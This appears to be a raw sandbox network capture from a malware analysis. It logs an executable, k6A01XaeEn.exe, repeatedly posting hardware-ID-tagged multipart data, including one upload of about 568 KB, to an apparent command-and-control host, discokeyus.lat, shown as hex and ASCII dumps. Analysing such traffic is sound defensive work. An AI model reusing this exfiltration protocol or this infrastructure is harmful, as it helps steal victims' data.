                                                                                              2024-12-18 19:54:19 UTC1369INData Raw: 49 32 53 52 68 33 50 75 4a 68 76 59 69 69 50 62 41 75 33 5a 36 38 57 77 5a 70 65 62 79 34 68 4b 78 35 72 36 4a 44 39 46 66 4b 34 71 47 72 66 71 4f 61 6b 62 43 70 32 72 4c 5a 39 61 75 4e 61 37 6d 73 35 56 71 49 37 63 6d 77 57 43 73 65 74 6e 49 41 56 69 72 6e 49 61 39 2f 6b 76 71 53 52 59 77 76 74 70 30 52 6e 35 32 66 58 42 6e 45 71 38 69 74 71 62 44 72 75 56 77 54 55 34 57 33 69 73 56 56 65 72 76 48 54 71 4a 68 2b 6b 68 51 50 4e 45 2b 6a 5a 75 65 36 4a 56 62 61 33 38 71 39 59 67 72 75 75 41 54 78 64 65 4b 34 71 47 72 66 71 4f 61 6b 62 43 70 32 72 4c 5a 30 34 2f 39 66 33 67 70 45 57 6f 38 6e 61 32 42 48 57 35 61 77 31 66 78 4d 37 71 57 64 49 76 61 78 69 2f 7a 56 66 70 49 55 44 7a 52 50 6f 32 62 6e 7a 67 31 79 73 6e 4d 2b 49 54 72 75 56 77 54 55 34 57 33 69
                                                                                              Data Ascii: I2SRh3PuJhvYiiPbAu3Z68WwZpeby4hKx5r6JD9FfK4qGrfqOakbCp2rLZ9auNa7ms5VqI7cmwWCsetnIAVirnIa9/kvqSRYwvtp0Rn52fXBnEq8itqbDruVwTU4W3isVVervHTqJh+khQPNE+jZue6JVba38q9YgruuATxdeK4qGrfqOakbCp2rLZ04/9f3gpEWo8na2BHW5aw1fxM7qWdIvaxi/zVfpIUDzRPo2bnzg1ysnM+ITruVwTU4W3i


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449732104.21.21.994437736C:\Users\user\Desktop\k6A01XaeEn.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 19:54:20 UTC273OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=6ZHM4NAAMLP
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18116
                                                                                              Host: discokeyus.lat
                                                                                              2024-12-18 19:54:20 UTC15331OUTData Raw: 2d 2d 36 5a 48 4d 34 4e 41 41 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 5a 48 4d 34 4e 41 41 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 5a 48 4d 34 4e 41 41 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 36 5a 48 4d 34 4e 41 41 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                              Data Ascii: --6ZHM4NAAMLPContent-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--6ZHM4NAAMLPContent-Disposition: form-data; name="pid"2--6ZHM4NAAMLPContent-Disposition: form-data; name="lid"4h5VfH----6ZHM4NAAMLPContent-D
                                                                                              2024-12-18 19:54:20 UTC2785OUTData Raw: c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f
                                                                                              Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
                                                                                              2024-12-18 19:54:22 UTC1042INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 19:54:22 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=e1d366l9tjc779lra9tinmmh4l; expires=Sun, 13-Apr-2025 13:41:00 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B71XfKRL7WmkuGuePkEOztKK0LrLX%2Bjm8ftIbb6yvSwRYLoBq5%2B6Dp9%2BgBy1tZ4nLBg%2Brm2QK4L1uDwGTyxV2hreoqsv7wisXydKklNo5fb93stmpXJREOb0o3gHUScT8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f41b447f9ce78d9-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1807&rtt_var=699&sent=15&recv=22&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19069&delivery_rate=1541710&cwnd=32&unsent_bytes=0&cid=12335ae627d80d3b&ts=1920&x=0"
                                                                                              2024-12-18 19:54:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-18 19:54:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449733104.21.21.994437736C:\Users\user\Desktop\k6A01XaeEn.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 19:54:24 UTC275OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=V0EFVHPNCHU9SB
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8755
                                                                                              Host: discokeyus.lat
                                                                                              2024-12-18 19:54:24 UTC8755OUTData Raw: 2d 2d 56 30 45 46 56 48 50 4e 43 48 55 39 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 30 45 46 56 48 50 4e 43 48 55 39 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 30 45 46 56 48 50 4e 43 48 55 39 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 56 30 45 46 56 48 50 4e 43 48 55 39 53
                                                                                              Data Ascii: --V0EFVHPNCHU9SBContent-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--V0EFVHPNCHU9SBContent-Disposition: form-data; name="pid"2--V0EFVHPNCHU9SBContent-Disposition: form-data; name="lid"4h5VfH----V0EFVHPNCHU9S
                                                                                              2024-12-18 19:54:25 UTC1035INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 19:54:25 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=c79pph3s5jar5oqcvjpglufn9r; expires=Sun, 13-Apr-2025 13:41:03 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MxQjMZ5gjgcwOX22DjmeSRbeBoUUnCl%2BJUE8MDBvZom6wvClx0KTCicEvsMwl3iToddOJ7XgQApkw5pw7pIWktGuLdZPPgUhDqQAlaSzer5rhwGne6m7GnKdEBdGqSv2dw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f41b45d6b867ca5-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1976&rtt_var=754&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9688&delivery_rate=1437715&cwnd=243&unsent_bytes=0&cid=acf0ea66f9480a5a&ts=1334&x=0"
                                                                                              2024-12-18 19:54:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-18 19:54:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449734104.21.21.994437736C:\Users\user\Desktop\k6A01XaeEn.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 19:54:27 UTC281OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=LQV78KY8PLN9TNUXAWQ
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20438
                                                                                              Host: discokeyus.lat
                                                                                              2024-12-18 19:54:27 UTC15331OUTData Raw: 2d 2d 4c 51 56 37 38 4b 59 38 50 4c 4e 39 54 4e 55 58 41 57 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 51 56 37 38 4b 59 38 50 4c 4e 39 54 4e 55 58 41 57 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 51 56 37 38 4b 59 38 50 4c 4e 39 54 4e 55 58 41 57 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a
                                                                                              Data Ascii: --LQV78KY8PLN9TNUXAWQContent-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--LQV78KY8PLN9TNUXAWQContent-Disposition: form-data; name="pid"3--LQV78KY8PLN9TNUXAWQContent-Disposition: form-data; name="lid"4h5VfH--
                                                                                              2024-12-18 19:54:27 UTC5107OUTData Raw: 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00
                                                                                              Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                              2024-12-18 19:54:30 UTC1043INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 19:54:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=23oqe8r3lqv597l4k7cavko8fl; expires=Sun, 13-Apr-2025 13:41:07 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yK5SGyKmsFJfXpGRJeJBcnuFYHFmLtewNWCBMdOCNpnYKTN7FsJq%2FdQ%2FJf3VEFJ59cE%2BaOvFCRBLZeOt1v3XfxrySAkGGasmxhSSz2ndY56MXsfbO3aLz9Vt4%2BHXZCIx1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f41b4704ae61a03-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1842&rtt_var=705&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21399&delivery_rate=1536842&cwnd=142&unsent_bytes=0&cid=f1916668e75c9cd7&ts=3888&x=0"
                                                                                              2024-12-18 19:54:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-18 19:54:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449737104.21.21.994437736C:\Users\user\Desktop\k6A01XaeEn.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 19:54:32 UTC276OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=5FSAVCL8ZA8U7M6
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1231
                                                                                              Host: discokeyus.lat
                                                                                              2024-12-18 19:54:32 UTC1231OUTData Raw: 2d 2d 35 46 53 41 56 43 4c 38 5a 41 38 55 37 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 46 53 41 56 43 4c 38 5a 41 38 55 37 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 46 53 41 56 43 4c 38 5a 41 38 55 37 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 35 46 53 41 56 43 4c 38 5a 41
                                                                                              Data Ascii: --5FSAVCL8ZA8U7M6Content-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--5FSAVCL8ZA8U7M6Content-Disposition: form-data; name="pid"1--5FSAVCL8ZA8U7M6Content-Disposition: form-data; name="lid"4h5VfH----5FSAVCL8ZA
                                                                                              2024-12-18 19:54:37 UTC1044INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 19:54:37 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=n9ok9apqtlk21cskba2g8qo7ae; expires=Sun, 13-Apr-2025 13:41:14 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3VNV1OP6APcTV9w3sI%2B9tmcmcxZVme6Hac%2F%2FUpm5kTLVA6Q0ivNvB7a%2F4yqvQV%2BJivCdXfM6STLJRRPds0zeufGQH2SMXITvyS5dcVZGo4x1YGQ%2FDF5J2eHiX8dWfqGomg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f41b495492941f9-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1616&rtt_var=610&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2143&delivery_rate=1789215&cwnd=212&unsent_bytes=0&cid=00294e3948938015&ts=4545&x=0"
                                                                                              2024-12-18 19:54:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-18 19:54:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449742104.21.21.994437736C:\Users\user\Desktop\k6A01XaeEn.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 19:54:39 UTC281OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=2HG77GWVKDAUVJU866
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 568750
                                                                                              Host: discokeyus.lat
                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: 2d 2d 32 48 47 37 37 47 57 56 4b 44 41 55 56 4a 55 38 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 48 47 37 37 47 57 56 4b 44 41 55 56 4a 55 38 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 48 47 37 37 47 57 56 4b 44 41 55 56 4a 55 38 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 32
                                                                                              Data Ascii: --2HG77GWVKDAUVJU866Content-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--2HG77GWVKDAUVJU866Content-Disposition: form-data; name="pid"1--2HG77GWVKDAUVJU866Content-Disposition: form-data; name="lid"4h5VfH----2
                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: 8c e3 85 ef a3 0b 05 97 fc 2a de 1d d4 60 8d 65 9c ea c4 83 9e 0b 1e 34 c7 56 6f 8b f3 bf 86 e2 8f 8a d0 3c a0 9b 68 52 32 f1 cf 05 17 67 a6 c1 8e 6d f9 83 09 4c 0c 23 9a e1 74 34 53 7b 65 a2 2f fb 55 d2 1d 9a ac 50 57 50 b8 46 77 c6 f9 66 2d 33 90 8b c2 34 dc d1 60 f1 c5 52 a4 12 ff 0d 37 5f 2e 01 78 e5 af 23 91 82 1f 6f 6b ad 1d 60 b5 6f 84 05 bf 16 a6 a6 ed 27 04 6a 8f b0 3a ff b0 b4 1c 63 06 a5 6a a3 19 31 52 f4 38 dc d6 f8 9a cd 85 b8 a9 97 9f 2d 94 2b 64 26 9f d5 b7 ea a2 6c 84 23 37 e0 64 dd ad bc 69 e2 74 74 58 b2 1f a6 eb f2 55 c5 d4 50 10 d4 f5 b5 c9 5a 8d 4d ee bb ed 16 69 58 67 28 b7 2a df 23 99 68 d3 61 85 2d 3b 56 cb 50 9b 5a 50 96 7a 2a 4a a2 5b 8e d5 27 b7 88 7e 0f b9 6b 2f 81 81 30 89 fd af be 0e 7d fe 98 af ba d4 d6 e8 40 d8 02 6b 6d 9c
                                                                                              Data Ascii: *`e4Vo<hR2gmL#t4S{e/UPWPFwf-34`R7_.x#ok`o'j:cj1R8-+d&l#7dittXUPZMiXg(*#ha-;VPZPz*J['~k/0}@km
                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: 59 73 ca 7e 8a b7 33 30 06 4f 50 ea b3 1b 45 cd 1c 8f 2f cf fd 8a 06 ad 3a ec 01 90 72 f3 78 13 6f c5 45 61 a6 4a e2 ab ac aa 96 dd ff 86 ba fe 53 09 b3 d1 88 d9 ec d8 1b fc 1f 5d 7b f1 ad 11 03 10 27 0d 82 e9 5c a3 78 08 df 33 ee 94 e9 10 eb 73 6b aa b1 83 9f fb 01 ce c0 46 f6 ed cc 3b 6d 5c 81 71 5e 20 d6 b9 53 73 73 76 ed cc cb 37 8c 09 f6 c5 3c 51 c1 7c 7b 14 e9 3f 44 53 8d 0a 91 40 bd 2c 46 9c f0 0a a8 64 00 dd 3d b6 ad 37 29 f5 bd c2 c0 4a 3b a5 55 e8 9e 99 57 af 1c 55 00 a7 94 87 80 b5 cf 3e ab 0a 85 87 09 e3 98 b0 a9 5f 21 99 ca 47 d8 8b 60 f3 07 11 4c 0c 53 e5 f6 da 4b 51 f5 d8 80 47 a2 c9 6e f1 5b 87 f9 4f 3d cc 6c 41 23 e0 4f 74 e1 eb 17 24 60 b4 a6 09 6f 13 98 15 8e 83 0c 5f e1 be 0d 58 57 80 34 0e 33 64 e4 1b ff 31 3c 1e 68 e6 9a bb 90 a4 5a
                                                                                              Data Ascii: Ys~30OPE/:rxoEaJS]{'\x3skF;m\q^ Sssv7<Q|{?DS@,Fd=7)J;UWU>_!G`LSKQGn[O=lA#Ot$`o_XW43d1<hZ
                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: 1f 32 37 85 8d 8d e8 36 2e 91 e7 79 9e ef 52 f2 13 9a ce 33 ab 56 ba 3f f9 66 20 11 77 d2 25 2c ed 7b d3 94 56 66 d1 29 52 fa 3e e9 7d 6b b4 b0 2a 61 db 07 24 1b a7 a8 b3 69 cc a6 36 32 2a b5 30 a1 d5 44 77 f9 d5 8d aa 8f d0 2f ae 1f 18 1d 21 16 e0 98 8a 24 38 bb 0b c3 f8 c3 78 69 0f 6c f7 84 eb f0 78 0b d1 10 e1 8b 4d 35 33 9d 01 3b ab 3c d0 1c 07 d1 e7 de 36 fc 87 57 ab f9 36 bc a3 81 30 e7 7a cf cb 51 d3 1e 86 31 70 7b ff d9 c5 60 11 c9 45 2f 3b 41 83 ff f2 43 23 c4 2f f7 17 f6 03 11 3e 26 3f 38 2b 96 bd b1 1e 79 c5 0e 3b 37 96 6f 3a 01 ea 31 dd 17 38 dc bc 49 9c e0 07 e7 66 3e 2d be b1 0b 6a c8 c8 af 81 f3 7e 3a 17 e0 e6 eb d5 4f 7d be 40 af 8d 70 34 5c 08 76 11 7c 06 5f f2 b0 2d 7b 5d 9a 7c 83 6a 66 15 2e b7 35 ce ff 61 1a a2 61 08 91 bf d2 b6 35 4c
                                                                                              Data Ascii: 276.yR3V?f w%,{Vf)R>}k*a$i62*0Dw/!$8xilxM53;<6W60zQ1p{`E/;AC#/>&?8+y;7o:18If>-j~:O}@p4\v|_-{]|jf.5aa5L
                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: 5e 58 6c 60 9a 89 a7 db 74 15 f3 74 20 0d f5 4e 1e b7 0a e0 6f 9a 65 88 35 41 f9 25 b7 59 85 29 b0 56 a8 6d 5b 8f 7d d9 99 81 10 cf 94 d5 a2 95 08 b8 a8 40 8f e7 b3 d8 e8 ef 7f 34 a0 25 82 e1 61 21 51 25 0f dc d2 95 a6 dc 3f 35 f9 4b 8e 2a 91 94 c8 e0 d1 21 cc 00 d7 09 e2 3b 91 97 42 4b f4 e5 9c 2e 22 a1 63 18 8e 0c 05 00 b8 0f 9c 0f 76 d9 98 cf 08 6f 6e 10 a9 1f 76 32 c2 48 43 50 79 6f f4 4a d2 82 1a 4b 85 76 2c e2 f0 d0 be 12 14 06 4f 7e 09 27 79 17 b0 27 94 c4 af 20 6e dd c0 47 5c 50 e3 6b 09 91 93 6a 2c d6 42 8a 7c c8 34 84 34 5e d8 d9 92 9f 06 bc 7b aa 75 88 6e a3 10 23 cb e9 5a 3b 83 d4 9e e7 15 6e 4e 8b ba 0c da 39 f1 a8 d5 0e 07 ed 49 e4 ad 24 ef a4 ac 24 a2 ed c8 8c 20 10 ad 3f b1 1f 78 e6 f7 52 7a 01 f5 9a 0c 34 cf a5 e1 fd 11 7a 8f 09 23 f5 55
                                                                                              Data Ascii: ^Xl`tt Noe5A%Y)Vm[}@4%a!Q%?5K*!;BK."cvonv2HCPyoJKv,O~'y' nG\Pkj,B|44^{un#Z;nN9I$$ ?xRz4z#U
